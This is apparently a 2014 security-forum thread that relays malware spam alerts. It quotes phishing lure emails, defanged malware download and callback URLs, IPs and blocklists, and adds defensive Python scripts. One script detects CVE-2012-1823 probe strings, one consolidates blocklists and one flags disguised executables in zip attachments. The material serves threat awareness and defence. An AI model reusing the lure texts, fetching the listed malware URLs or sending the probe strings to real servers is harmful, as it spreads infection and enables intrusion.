Fake Payroll Information Notification Email Messages - 2014 Mar 20
Fake Incoming Money Transfer Notification Email Messages - 2014 Mar 20
Fake Bank Payment Transfer Notification Email Messages - 2014 Mar 20
Fake Lawsuit Details Attachment Email Messages - 2014 Mar 20
Fake Account Payment Information Email Messages - 2014 Mar 20
Fake Product Order Notification Email Messages - 2014 Mar 20
Fake Failed Delivery Notification Email Messages - 2014 Mar 20
Fake Bank Transaction Notification Email Messages - 2014 Mar 19
(More detail and links at the cisco URL above.)

:mad: :sad:
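
A defender's check for the CVE-2012-1823 pattern in the Ars/Imperva item above, as an added example that is not from either article or from this thread. php-cgi treated a query string containing no `=` as command-line options, so a probe shows up in the web server log as an `=`-free query string whose decoded form starts with a dash (the widely circulated mod_rewrite workaround used the same two conditions; upgrading PHP was and is the actual fix). The log lines below are constructed (RFC 5737 documentation addresses), the regex covers common/combined Apache log formats, and the script only reports.

```python
import re
from urllib.parse import unquote_plus

# Only the request line matters here; the pattern covers common and combined log formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def is_cgi_argv_injection(target: str) -> bool:
    """True if the request target matches the CVE-2012-1823 pattern.

    php-cgi treated a query string as command-line arguments only when the
    *raw* string contained no '='; this check mirrors that (raw '=' test
    first, URL-decode afterwards), so an encoded '%2d' is caught as well.
    """
    if "?" not in target:
        return False
    raw_query = target.split("?", 1)[1]
    if not raw_query or "=" in raw_query:
        return False
    decoded = unquote_plus(raw_query)
    return any(tok.startswith("-") for tok in decoded.split())


def scan_log(lines):
    """Return (client_ip, target) for every request that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cgi_argv_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Mar/2014:10:01:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/Mar/2014:10:01:09 +0000] "GET /index.php?-s HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [19/Mar/2014:10:02:14 +0000] "GET /cgi-bin/php?%2Ds HTTP/1.1" 200 4096 "-" "curl/7.29"',
    '203.0.113.7 - - [19/Mar/2014:10:03:01 +0000] "GET /status.php?debug HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [19/Mar/2014:10:03:30 +0000] "GET /index.php?q=%2Ds HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"possible CVE-2012-1823 probe from {ip}: {target}")
```

Note the two false-positive guards: `?debug` (no `=`, but no dash) is a normal keyless query and is not flagged, and `?q=%2Ds` is not flagged because the raw string contains `=` and php-cgi would have parsed it as a normal parameter.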

AplusWebMaster
2014-03-21, 15:07
FYI...

Fake Amazon .co .uk SPAM, Something evil on 50.116.4.71
- http://blog.dynamoo.com/2014/03/amazoncouk-spam-something-evil-on.html
21 Mar 2014 - "This -fake- Amazon .co .uk spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 13:40:05 +0530 [04:10:05 EDT]
From: "AMAZON .CO .UK" [SALES@ AMAZON .CO .UK]
Cc: ; Fri, 21 Mar 2014 13:40:05 +0530
Subject: Your Amazon.co.uk order ID841-6379889-7781077
Hello, Thanks for your order. We’ll let you know once your item(s) have dispatched. You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order #799-5059801-3688207 Placed on March 21, 2014 Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .co .uk...

There is an attachment Order details 21.04.2014 Amazon 19-1101.zip which contains a quite large 596Kb malicious executable Order details 21.04.2014 Amazon 19-1101.exe which only has a VirusTotal detection rate of 2/51*. The Malwr analysis** is the most comprehensive, and shows that it attempts to phone home... Out of these, aulbbiwslxpvvphxnjij .biz seems to be active on 50.116.4.71 (Linode, US). Combining the "phone home" domains with the other malicious domains hosted on that IP gives the following recommended blocklist:
50.116.4.71
afaxdlrnjdevgddqrcvkdmvemwo .org ..."
(Long list at the dynamoo URL above.)

* https://www.virustotal.com/en-gb/file/e29581210f0b598569efc5320706650f7d95860deaf05a064ba4097f72e8f052/analysis/1395393900/

** https://malwr.com/analysis/MWI1MGFlYTIyNzBkNGM4Y2I4NmIzOGMzMmViZTk4ZjI/

- https://www.virustotal.com/en/ip-address/50.116.4.71/information/
___

Fake Companies House SPAM and 50.116.4.71 (again)
- http://blog.dynamoo.com/2014/03/companies-house-spam-and-50116471-again.html
21 Mar 2014 - "This -fake- Companies House spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 11:05:35 +0100 [06:05:35 EDT]
From: Companies House [WebFiling@ companieshouse .gov .uk]
Subject: Incident 8435407 - Companies House
The submission number is: 8435407
For more details please check attached file.
Please quote this number in any communications with Companies House.
All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.
Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other Organizations that handle public funds.
If you have any queries please contact the Companies House Contact Centre
on +44 (0)303 1234 500 or email enquiries@companies-house .gov .uK
Note: This email was sent from a notification-only email address which cannot
accept incoming email. Please do not reply directly to this message...

Attached is an archive file CH_Case_8435407.zip which in turn contains the malicious executable CH_Case_21032014.scr which has a VirusTotal detection rate of 3/49*. The Malwr analysis -again- shows an attempted connection to a Linode IP at 50.116.4.71 using the domain aulbbiwslxpvvphxnjij .biz. The malware also downloads a config file from a hacked WordPress installation at [donotclick]premiercrufinewine .co .uk/wp-content/uploads/2014/03/2103UKp.qta plus a number of other domains that are not resolving (listed below). I would recommend... the following blocklist in combination with this one.
50.116.4.71
aulbbiwslxpvvphxnjij.biz ..."
(Long list at the dynamoo URL above.)

* https://www.virustotal.com/en-gb/file/1c3a24492f53fa16107f2ec01294bf188c32dc6c7a407a814b76685e4176a71a/analysis/1395396703/
___

Fake Air Canada Ticket - malware
- http://www.threattracksecurity.com/it-blog/air-canada-ticket-malware/
Mar 20, 2014 - "... The email (pictured below) was directed to an employee inbox purporting to be from Air Canada and directing the recipient to download and print their ticket. (Note: Air Canada was not hacked, nor were they part of this malware. The malicious URL distributing a previously unidentified malware is simply being masked to look like it’s coming from Air Canada.)
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/03/Air-Canada-Malicious-Email.png
The link hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?action=download&fid=QB820910108CA pointed to another address, hxxp ://alienstub.com/pdf_ticket_820910108.zip, which hosts the malware, a zipped malicious file. Once the zip file is decompressed, the user will see a file called pdf_ticket_820910108.pif. Analysis by ThreatSecure quickly revealed the sample as an exploit categorized with a high severity (see in-product analysis screen below), exhibiting malicious behavior like disabling the Windows firewall, changing proxy settings in Internet Explorer, opening the command prompt, creating executable files and connecting to Windows Remote Access Connection Manager.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/03/Air-Canada-pdf_ticket_820910108_pif-analsysi.jpg
... At the time of posting this blog, 16/51* antivirus vendors on VirusTotal detect this file as being malicious. The domain hxxp ://alienstub .com appears to be registered in China...
* https://www.virustotal.com/en/file/dbe55e69e25eb2a71208c8b223e2527cdc2912c95500276499e761c0fe687622/analysis/

alienstub .com

108.162.198.134 - https://www.virustotal.com/en-gb/ip-address/108.162.198.134/information/

108.162.199.134 - https://www.virustotal.com/en-gb/ip-address/108.162.199.134/information/

:fear: :mad:

AplusWebMaster
2014-03-23, 13:33
FYI...

Malware sites to block 23/3/14 (P2P/Gameover Zeus)
- http://blog.dynamoo.com/2014/03/malware-sites-to-block-23314.html
23 Mar 2014 - "These domains and IPs are associated with the Peer-to-peer / Gameover variant of Zeus as described in this blog post at MalwareMustDie*. I recommend that you -block- the -IPs- and/or domains listed as they are all malicious:
50.116.4.71 (Linode, US) ...
178.79.178.243 (Linode, UK)
212.71.235.232 (Linode, UK)
23.239.140.156 (Root Level Technology, US)

50.116.4.71 ...
178.79.178.243 ...
212.71.235.232 ...
23.239.140.156 ..."
(More - long list of domains listed at the dynamoo URL above.)
* http://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html

:mad::mad: :fear:

AplusWebMaster
2014-03-25, 15:42
FYI...

Fake Flash update hosted on OneDrive
- http://blog.dynamoo.com/2014/03/js-injection-leads-to-fake-flash-update.html
25 Mar 2014 - "This kind of attack is nothing new, but there has been a sharp uptick recently in injection attacks that alter .js files on vulnerable systems. The payload is a -fake- Flash update with a surprisingly low detection rate, hosted on Microsoft OneDrive. The first step in the attack is through a vulnerable site such as this one. In turn, the infected .js file leads to [donotclick]alientechdesigns .com/NLBFH8ZG.php?id=88473423 which in turn leads to a fake Flash popup hosted at [donotclick]alientechdesigns .com/NLBFH8ZG.php?html=27 which you can see an approximation of here [urlquery**].
> https://lh3.ggpht.com/-sLx4s_0GoKQ/UzFS03GnLzI/AAAAAAAACvo/Ee3FYtmdQS4/s1600/fake-flash.jpg
The link in the popup goes to a download location at [donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21111 which downloads a file flashplayerinstaller.exe. flashplayerinstaller.exe is the first stage in the infection; it has a VirusTotal detection rate of just 3/51***. The Malwr report shows that this then downloads two additional components, from:
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21112
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21108
The first one of these is called flashplayer2.exe which has a VirusTotal detection rate of 4/51 [5]. Malwr, Anubis and Comodo CAMAS show some working of this malware. The second file is called update2.exe with a VirusTotal detection rate of 5/49****. This seems somewhat resistant to automated analysis tools... This sort of attack is hard to block from a network point of view as it leverages legitimate sites. Perhaps the best way to protect yourself is a bit of user education about where it is appropriate to download updates from."
* http://urlquery.net/report.php?id=1395739538065

** http://urlquery.net/report.php?id=1395739786885

*** https://www.virustotal.com/en-gb/file/c4eb5f04b6af9115b01b66e79319549022985fea8c8601baedb97984f85aadf2/analysis/1395739964/

**** https://www.virustotal.com/en-gb/file/03dcf82ca30117fd9d6a6c2e88dcc7bfae245264185d9076ed8f292de5ef063c/analysis/1395742041/

5] https://www.virustotal.com/en/file/9741fa0533065246754c8d9cb224c92dd2c7bb4db3a43657c22d6870ee85b276/analysis/1395740434/
___

Fake HMRC SPAM
- http://blog.dynamoo.com/2014/03/you-have-received-new-messages-from.html
25 Mar 2014 - "This fake HMRC spam comes with a malicious attachment:
Date: Tue, 25 Mar 2014 12:59:28 +0100 [07:59:28 EDT]
From: "noreply@hmrc .gov .uk" [noreply@hmrc .gov .uk]
Subject: You have received new messages from HMRC
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Please do not reply to this e-mail.
1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system. 2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices....

The attachment is called HMRC_TAX_Notice_rep.zip which in turn contains a malicious executable HMRC_TAX_Notice_rep.scr which has a VirusTotal detection rate of 5/51*. According to the Malwr report, the malware makes a download from the following locations hosted on 67.205.16.21 (New Dream Network, US):
[donotclick]sandsca .com.au/directions/2503UKp.tis
[donotclick]www.sandsca .com.au/directions/2503UKp.tis
Subsequent communications are made with aulbbiwslxpvvphxnjij .biz on the familiar looking Linode IP of 50.116.4.71, and also qkdapcqinizsczxrwaelaimznfbqq .biz on another Linode IP of 178.79.178.243. An attempt is also made to connect to hzdmjjneyeuxkpzkrunrgyqgcukf .org which does not resolve...
Recommended blocklist:
50.116.4.71
178.79.178.243
sandsca .com
aulbbiwslxpvvphxnjij .biz
qkdapcqinizsczxrwaelaimznfbqq .biz
hzdmjjneyeuxkpzkrunrgyqgcukf .org "
* https://www.virustotal.com/en-gb/file/720a7e07e609424154f879bb20af8cc93cf9bd490adf0c4c31a836e1403cb9a7/analysis/1395750216/

- https://www.virustotal.com/en/ip-address/67.205.16.21/information/

- https://www.virustotal.com/en/ip-address/50.116.4.71/information/

- https://www.virustotal.com/en/ip-address/178.79.178.243/information/
___

Google Drive Email - Phish ...
- http://www.hoax-slayer.com/google-drive-email-phishing-scam.shtml
Mar 25, 2014 - "... email requests recipients to click a link to view a document that the sender uploaded using Google Cloud Drive. There is no document to be viewed, urgent or otherwise. The email is a -phishing- scam designed to trick recipients into giving their email login details to Internet criminals... Example:
Hello,
Kindly click the link to view the document I uploaded for you using Google
cloud drive.
[Link removed]
Just Sign in with your email to view the document, it is very important.
Thank you,
Rev. Dr. Karen [Surname Removed]
Serving Humanity Spiritually
[Phone number removed]
Good works are links that form a chain of love.
Mother Teresa

Screenshot of phishing website:
> http://www.hoax-slayer.com/images/google-drive-email-phishing-scam-1.jpg
... Users who fall for the ruse and click the link as instructed will be taken to a -bogus- website that includes the Google Drive logo along with a login screen that asks for both their email address and email password. If users submit their email credentials as requested and click the 'View document' button, they will be redirected to Google's Gmail home page... however, their email address and password will be sent to online criminals. The criminals can use the stolen details to hijack webmail accounts belonging to victims. Hijacked accounts can be used to perpetrate more scam and spam campaigns, all in the names of the victims. If victims submitted details for a Gmail account, the scammers may be able to use the same login information to access other Google services as well as email..."
___

Gameover ZeuS now targets users of employment websites
- http://net-security.org/malware_news.php?id=2745
Mar 25, 2014 - "Some newer variants of the Gameover Zeus Trojan, which is exceptionally good at using complex web injections to perform Man-in-the-Browser (MITB) attacks and gain additional information about the victims to be used for bypassing multi-factor authentication mechanisms and effecting social engineering attacks, have been spotted targeting users of popular employment websites. They initially focused on CareerBuilder.com (largest employment website in the US), but now also on Monster.com (one of the largest in the world). The -fake- login page victims are served with looks virtually identical to the legitimate one, but the next one is a web form injected by the malware:
> http://www.net-security.org/images/articles/monster-25032014.jpg
There are 18 different questions to choose from, and they range from the name of the city where your sibling lives/you got your first job/you met your spouse, to the name of your school(s)/friend/work supervisor and significant dates and numbers in your life..."

- http://www.f-secure.com/weblog/archives/00002687.html
March 25, 2014
___

Deceptive ads expose users to the Adware.Linkular/Win32.SpeedUpMyPC.A PUAs
- http://www.webroot.com/blog/2014/03/25/deceptive-ads-expose-users-adware-linkularwin32-speedupmypc-puas-potentially-unwanted-applications/
Mar 25, 2014 - "Rogue vendors of Potentially Unwanted Applications (PUAs) continue tricking tens of thousands of gullible users into installing deceptive and privacy violating applications. Largely relying on ‘visual social engineering’ tactics and basic branding concepts, the majority of campaigns convincingly present users with legitimately looking ToS (Terms of Service)/EULA (End User License Agreements) which socially engineered users accept, thereby assuming the responsibility for the potential privacy-violating activities taking place on their host. We’ve recently spotted yet another PUA campaign, relying on deceptive “Download Now” types of ads, enticing users into downloading the bogus GetMyFiles (Adware.Linkular) application, as well as the rogue SpeedUpMyPC (Win32.SpeedUpMyPC.A) PUA...
Sample screenshot of Adware.Linkular download page:
> https://www.webroot.com/blog/wp-content/uploads/2014/03/W32.Linkular_W32.SpeedUpMy_PUA_Potentially_Unwanted_Application.png
Sample screenshot of Win32.SpeedUpMyPC.A download page:
> https://www.webroot.com/blog/wp-content/uploads/2014/03/W32.Linkular_W32.SpeedUpMy_PUA_Potentially_Unwanted_Application_01.png
Domain name reconnaissance:
getmyfilesnow .info – 54.208.165.36
getmyfilesnow .com – 174.142.147.2
coollinks .us – 174.142.147.5
linkular .com – 208.109.216.125
Detection rate for the PUA: MD5: 0d60941d1ec284cab2e861e05df89511 * ...
Known to have responded to 54.208.165.36 ...
Once executed, the sample phones back to:
hxxp // 107.23.152.80 /api/software/?s=887&os=win32&output=1&v=2.2.2&l=1033&np=0&osv=5.1&b=ie&bv=8.0.6001.18702&c=12&cv=2.2.2.1768
Sample detection rate for the Win32.SpeedUpMyPC.A PUA:
MD5: 0a8ecb11e39db5647dcad9f0cc938c99 ** ... "
* https://www.virustotal.com/en/file/27e3a79e9405ac38cd0f1553d412a564279e1f300f89b8fafcc0034165a62263/analysis/1395713453/

** https://www.virustotal.com/en/file/eb14a3e1aa2fab53c557f26130b7c1a59280d7fbb331675de7aae59526fe8328/analysis/1395717259/

:mad::mad: :fear:
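
The blocklists in these posts are published "defanged" (`hxxp`, `[donotclick]`, `example .com`) and mix single IPs, CIDR ranges, bare domains and full URLs. As an added example that is not from dynamoo, Webroot or this thread, here is a small Python consolidator: it refangs the tokens, classifies each one, folds the host of every URL into the IP/domain sets, and answers whether a given host falls inside the resulting list (CIDR-aware for addresses, subdomain-aware for names). The sample lines are taken from the posts above; the `refang` heuristics are my own assumptions about this notation and will need adjusting for other sources.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Sample input, copied from the defanged blocklists in the posts above.
SAMPLE_LINES = """
Recommended blocklist:
50.116.4.71
178.79.178.243 (Linode, UK) ...
64.120.242.160/27
sandsca .com
aulbbiwslxpvvphxnjij .biz
[donotclick]premiercrufinewine .co .uk/wp-content/uploads/2014/03/2103UKp.qta
hxxp ://alienstub.com/pdf_ticket_820910108.zip
hxxp // 107.23.152.80 /api/software/?s=887
""".splitlines()


def refang(token: str) -> str:
    """Undo the defanging ('hxxp', '[donotclick]', 'example .com') so the indicator parses."""
    t = token.strip()
    t = re.sub(r"\s*\(.*$", "", t).rstrip(" .")              # drop "(Linode, UK) ..." trailers
    t = t.replace("[donotclick]", "")
    t = re.sub(r"^hxxp(s?)\s*:?\s*//\s*", r"http\1://", t, flags=re.IGNORECASE)
    t = re.sub(r"\s*\.\s*", ".", t)                           # "example .co .uk" -> "example.co.uk"
    t = re.sub(r"\s+/", "/", t)                               # "1.2.3.4 /api" -> "1.2.3.4/api"
    return t


def classify(indicator: str):
    """Return (kind, value) with kind one of 'ip', 'cidr', 'url', 'domain'."""
    try:
        net = ipaddress.ip_network(indicator, strict=False)
        if "/" in indicator:
            return "cidr", str(net)
        return "ip", str(net.network_address)
    except ValueError:
        pass
    if "/" in indicator:                                      # host plus path: treat as URL
        url = indicator if indicator.startswith("http") else "http://" + indicator
        return "url", url
    return "domain", indicator.lower()


class Blocklist:
    def __init__(self, lines):
        self.networks, self.domains, self.urls = [], set(), set()
        for raw in lines:
            ind = refang(raw)
            if not ind or ind.endswith(":"):                  # blank line or a heading
                continue
            self._add(*classify(ind))

    def _add(self, kind, value):
        if kind in ("ip", "cidr"):
            self.networks.append(ipaddress.ip_network(value, strict=False))
        elif kind == "domain":
            self.domains.add(value)
        else:
            self.urls.add(value)
            self._add(*classify(urlparse(value).hostname))    # the URL's host is an indicator too

    def is_blocked(self, host: str) -> bool:
        """CIDR match for addresses, exact or parent-domain match for names."""
        host = host.lower().rstrip(".")
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            return any(host == d or host.endswith("." + d) for d in self.domains)
        return any(ip in net for net in self.networks)


if __name__ == "__main__":
    bl = Blocklist(SAMPLE_LINES)
    print("networks:", [str(n) for n in bl.networks])
    print("domains: ", sorted(bl.domains))
    for probe in ("64.120.242.180", "www.aulbbiwslxpvvphxnjij.biz", "example.com"):
        print(f"{probe}: {'BLOCK' if bl.is_blocked(probe) else 'allow'}")
```

The `/27` handling is the point of using `ipaddress` rather than string comparison: the 64.120.242.160/27 range from the earlier dynamoo post covers .160 through .191, so a lookup for .180 is blocked while .200 is not, without listing every address.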

AplusWebMaster
2014-03-26, 18:27
FYI...

Something evil on 173.212.223.249
- http://blog.dynamoo.com/2014/03/something-evil-on-173212223249.html
26 Mar 2014 - "There's some sort of evil at work here, but I can't quite replicate it.. however I would recommend that you put a block in for 173.212.223.249 (Network Operations Center, US). The infection chain I have spotted here starts with a typical compromised website, in this case:
[donotclick]onerecipedaily .com/prawn-patia-from-anjum-anands-i-love-curry/
A quick look at the URLquery report* shows a general alert, but no smoking gun.. The incident logs come up with a generic detection... The following malicious subdomains are also active on 173.212.223.249:
bkbr.beuqnyrtz .com
syb.beuqnyrtz .com
sxxmxv.beuqnyrtz .info
The simplest thing to do to protect yourself against this particular threat is to use the following blocklist:
173.212.223.249
beuqnyrtz .com
beuqnyrtz .info "
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1395844844686

- https://www.virustotal.com/en/ip-address/173.212.223.249/information/

- https://www.virustotal.com/en/ip-address/184.168.179.1/information/
___

Info from SantanderBillpayment. co .uk - fake PDF malware
- http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
26 Mar 2014 - "Info from SantanderBillpayment.co.uk pretending to come from Santanderbillpayment-noreply@SantanderBillPayment .co .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. Analysis of this one is showing it likely to be a Gameover Zeus/Zbot variant. This is “new” — it’s going after a similar URL as the Pony samples we have been seeing in the last few weeks, but completely different binary. This has VM detection and if it detects that, it runs routines to choke memory and the CPU. On real hardware, it tries this URL (http :// 62.76.45.233 /2p/1.exe) given recent patterns, this is likely to be a Gameover production...
Thank you for using BillPay. Please keep this email for your records.
The following transaction was received on 18 March 2014 at 20:03:41.
Payment type: VAT
Customer reference no: 9789049470611
Card type: Visa Debit
Amount: 483.93 GBP
Your transaction reference number for this payment is IR19758383.
Please quote this reference number in any future communication regarding this payment.
Full information in attachment.
Yours sincerely,
Banking Operations
This message is intended for the named person above and may be confidential, privileged or otherwise protected from disclosure...

26 March 2014 : VAT_F37D8FE5F9.zip (72kb) : Extracts to ATT00347_761105586544.pdf.exe
Current Virus total detections: 7/51* MALWR Auto Analysis** ...
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c206690a0e6a12dd8c9f2052029221db0fad83c1750a10a83a21216dda42d4a2/analysis/

** https://malwr.com/analysis/NTQyOGVhNDc1NTJiNDQ5OGFiYTA3ZTRlMDZmMjVhMDk/

- https://www.virustotal.com/en/ip-address/62.76.45.233/information/

:mad::fear::sad:
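
The double-extension trick the Santander post describes (`ATT00347_761105586544.pdf.exe` displayed as a PDF when "show known file extensions" is off) is straightforward to catch at a mail gateway before the archive reaches a desktop. As an added example, not from myonlinesecurity.co.uk or this thread, the Python below opens a zip attachment in memory and gives each member a verdict from its extension chain and from the PE `MZ` header at the start of its content, so a file that is renamed rather than double-extended is still caught. The archive is constructed here with placeholder bytes; only the member names follow the posts.

```python
import io
import zipfile

# Extensions Windows will execute directly when double-clicked (not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf", "hta", "jar"}
# Extensions users expect to be harmless documents or images.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt", "jpg", "jpeg", "png"}


def attachment_risk(name: str, head: bytes) -> str:
    """Classify one archive member by its name and the first bytes of its content."""
    base = name.lower().rsplit("/", 1)[-1]
    parts = base.split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTS:
        if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
            return "disguised-executable"         # e.g. invoice.pdf.exe
        return "executable"
    if head.startswith(b"MZ"):                     # PE header behind a harmless-looking name
        return "pe-with-document-extension"
    return "ok"


def scan_zip(data: bytes):
    """Return (member name, verdict) for every file in the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)
            findings.append((info.filename, attachment_risk(info.filename, head)))
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive: member names follow the posts above, contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ATT00347_761105586544.pdf.exe", b"MZ placeholder, not a real binary")
        zf.writestr("SecureMessage.scr", b"MZ placeholder, not a real binary")
        zf.writestr("invoice.pdf", b"MZ placeholder, not a real binary")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for name, verdict in scan_zip(build_sample_zip()):
        print(f"{verdict:28s} {name}")
```

Reading only the first two bytes keeps the check cheap on large attachments; a gateway would normally quarantine on any verdict other than `ok` rather than try to judge the payload further.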

AplusWebMaster
2014-03-27, 12:22
FYI...

Malware magnets ...
Cisco's threat metrics show pharmaceutical and chemical firms are 11 times more susceptible to Web malware
- http://www.infoworld.com/t/cyber-crime/chemical-and-drug-makers-are-the-biggest-malware-magnets-238909
Mar 24, 2014 - "... Cyber crime has been estimated* at costing the U.S. economy $100 billion annually, with smaller companies feeling the pain** more often due to inadequate defenses. If Cisco's analyses are on track - and the numbers hold true for people outside of Cisco's customer base - attacks are likely to grow even more targeted to match their victims in the future, with narrower niches singled out by attackers based on their industry."
* http://www.infoworld.com/d/security/cyber-crime-costs-us-economy-100-billion-and-500000-jobs-223352

** http://www.infoworld.com/d/security/symantec-report-finds-small-businesses-battered-cyber-crime-216543

Feb 2014 Threat Metrics
- http://blogs.cisco.com/security/february-2014-threat-metrics/
Mar 21, 2014 - "Web surfers in February 2014 experienced a median malware encounter rate of 1:341 requests, compared to a January 2014 median encounter rate of 1:375. This represents a 10% increase in risk of encountering web-delivered malware during the second month of the year. February 8, 9, and 16 were the highest risk days overall, at 1:244, 1:261, and 1:269, respectively. Interestingly, though perhaps not unexpectedly, web surfers were 77% more likely to encounter Facebook scams on the weekend compared to weekdays. 18% of all web malware encounters in February 2014 were for Facebook related scams.
> http://blogs.cisco.com/wp-content/uploads/Feb2014Rate.jpg
The ratio of unique non-malicious hosts to unique malware hosts was fairly constant between the two months, at 1:4808 in January 2014 and 1:4775 in February 2014. Likewise, the rate of unique non-malicious IP addresses to malicious IP addresses was also similar between the two months, at 1:1330 in January 2014 compared to 1:1352 in February 2014.
> http://blogs.cisco.com/wp-content/uploads/Feb2014hosts.jpg
While Java malware encounters were 4% of all web malware encounters in January 2014, that rate increased to 9% in February. Of particular interest was the increase in the rate of Java malware encounters involving versions older than Java 7 or Java 6, which increased to 33% of all Java malware encounters in February 2014 from just 13% in the month prior.
> http://blogs.cisco.com/wp-content/uploads/Feb2014java.jpg
During the month of February 2014, risk ratings for companies in the Media & Publishing vertical increased 417%, Utilities increased 218%, and Insurance 153%. Companies in Pharmaceutical & Chemical remained at a consistent high rate, with a slight increase from a 990% risk rating in January 2014 to an 1100% risk rating in February. To assess vertical risk, we first calculate the median encounter rate for all enterprises, and then calculate the median encounter rate for all enterprises in a particular vertical, then compare the two. A rate higher than 100% is considered an increased risk.
> http://blogs.cisco.com/wp-content/uploads/Feb2014vert.jpg
Following a January 2014 spam volume decrease of 20% in January 2014, spam volumes increased 73% in February 2014...
> http://blogs.cisco.com/wp-content/uploads/Feb2014spamvol.jpg
The top five global spam senders in February 2014 were the United States at 16.5%, followed by the Russian Federation at 12.41%, with Spain, China, and Germany a distant 3.77%, 3.39%, and 3%, respectively. Though the Russian Federation was also in the number two spot in January 2014, it was a significant volume increase from only 5.10% of global spam origin that month."
___

Secure Message from various banks – fake PDF malware
- http://myonlinesecurity.co.uk/secure-message-various-uk-foreign-banks-fake-pdf-malware/
Mar 27, 2014 - "... pretends to come from various banks is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details... We have seen a couple of different versions over the last few days from different banks, including HSBC, and Natwest...
Subjects seen are:
You have a new Secure Message
You have received a secure message
HSBC secure mail
Secure Message
You have received a secure message
Read your secure message by opening the attachment. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the HSBC Secure Mail Help Desk.
First time users – will need to register after opening the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/hsbc-secure-mail.png

Natwest Secure Message:
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk...

27 March 2014 : Version 1 (NatWest bank) SecureMessage.zip (8kb) Extracts to SecureMessage.exe (19kb)
Current Virus total detections: 5/51* MALWR Auto Analysis **
